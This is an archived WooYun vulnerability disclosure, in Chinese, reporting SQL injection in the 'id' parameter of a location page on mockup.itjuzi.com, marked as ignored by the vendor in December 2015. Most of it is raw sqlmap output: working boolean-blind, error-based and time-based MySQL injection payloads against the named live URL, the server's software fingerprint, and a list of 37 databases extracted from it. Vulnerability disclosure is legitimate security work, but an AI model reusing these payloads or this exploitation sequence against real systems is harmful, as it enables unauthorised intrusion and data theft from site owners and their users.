乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-16: 细节已通知厂商并且等待厂商处理中 2015-12-21: 厂商已经主动忽略漏洞,细节向公众公开
23333
http://mockup.itjuzi.com:80/location?id=-9414参数ID可注入
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection point(s) with a total of 380 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: http://mockup.itjuzi.com:80/location?id=-1687" OR 2182=2182#&type=com Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: http://mockup.itjuzi.com:80/location?id=-9414" OR 1 GROUP BY CONCAT(0x7178706271,(SELECT (CASE WHEN (4546=4546) THEN 1 ELSE 0 END)),0x7162766271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&type=com Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment) Payload: http://mockup.itjuzi.com:80/location?id=" AND (SELECT * FROM (SELECT(SLEEP(5)))lwNI)#&type=com---[18:08:09] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[18:08:09] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 7web application technology: PHP 5.4.13, Nginxback-end DBMS: MySQL 5.0.12[18:08:09] [INFO] fetching database names[18:08:17] [INFO] the SQL query used returns 37 entries[18:08:18] [INFO] retrieved: information_schema[18:08:18] [INFO] retrieved: aidena[18:08:19] [INFO] retrieved: apple[18:08:19] [INFO] retrieved: apple_cn[18:08:20] [INFO] retrieved: avgouzai[18:08:21] [INFO] retrieved: bdxzjklt[18:08:22] [INFO] retrieved: blog_chktips[18:08:22] [INFO] retrieved: blogitjuzi[18:08:23] [INFO] retrieved: cciehunhun[18:08:23] [INFO] retrieved: chktips[18:08:31] [INFO] retrieved: dear_there[18:08:32] [INFO] retrieved: demo_chktips[18:08:32] [INFO] retrieved: dengta[18:08:33] [INFO] retrieved: dev_yahoo[18:08:36] [INFO] retrieved: itjuzi[18:08:37] [INFO] retrieved: itjuzidemo[18:08:37] [INFO] retrieved: jutongshe[18:08:38] [INFO] retrieved: kejiju[18:08:38] [INFO] retrieved: kids_db[18:08:39] [INFO] retrieved: letcodefly[18:08:39] [INFO] retrieved: meximexi[18:08:40] [INFO] retrieved: mysql[18:08:40] [INFO] retrieved: mysqlslap[18:08:41] [INFO] retrieved: nagios[18:08:41] [INFO] retrieved: psdhere[18:08:41] [INFO] retrieved: redmine[18:08:42] [INFO] retrieved: seeker[18:08:42] [INFO] retrieved: seeker_test[18:08:43] [INFO] retrieved: sochips[18:08:49] [INFO] retrieved: spider_article[18:08:49] [INFO] retrieved: ssmli[18:08:50] [INFO] retrieved: test[18:08:50] [INFO] retrieved: tobshe[18:08:51] [INFO] retrieved: touzishuju[18:08:51] [INFO] retrieved: wp_new[18:08:52] [INFO] retrieved: wp_new_2[18:08:52] [INFO] retrieved: zangelsavailable databases [37]:[*] aidena[*] apple[*] apple_cn[*] avgouzai[*] bdxzjklt[*] blog_chktips[*] blogitjuzi[*] cciehunhun[*] chktips[*] dear_there[*] demo_chktips[*] dengta[*] dev_yahoo[*] information_schema[*] itjuzi[*] itjuzidemo[*] jutongshe[*] kejiju[*] kids_db[*] letcodefly[*] meximexi[*] mysql[*] mysqlslap[*] nagios[*] psdhere[*] redmine[*] seeker[*] seeker_test[*] sochips[*] spider_article[*] ssmli[*] test[*] tobshe[*] touzishuju[*] wp_new[*] wp_new_2[*] zangels[18:08:52] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 281 times, 502 (Bad Gateway) - 1 times[18:08:52] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\mockup.itjuzi.com'[*] shutting down at 18:08:52
危害等级:无影响厂商忽略
忽略时间:2015-12-21 18:50
漏洞Rank:4 (WooYun评价)
暂无